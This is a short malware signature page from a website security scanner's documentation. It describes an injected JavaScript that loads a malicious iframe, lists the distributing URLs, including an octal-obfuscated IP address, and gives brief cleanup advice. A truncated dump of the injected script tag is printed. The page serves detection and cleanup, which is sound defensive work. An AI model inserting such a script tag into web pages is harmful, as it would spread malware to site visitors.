SiteCheck Signatures

  1. Home
  2. Docs
  3. SiteCheck Signatures
  4. malware-entry-mwjs518

malware-entry-mwjs518

Description: Javascript included and used to distribute malware. It calls a malicious iframe once loaded.

Domains used: (all inside the 91.217.162.0/24 network):


http://0133.0331.0242.0033/0132.js
http://javadisplay.com/in.cgi?2

Affecting: Any web site (no traffic specified)

Clean up: Malware is not hidden and a search / replce should fix it. Contact b>support@sucuri.net if you have questions or want us to clean it up for you.

Malware dump:


<script language="javascript" src="http://0133.0331.O242. 0033/0132.js"..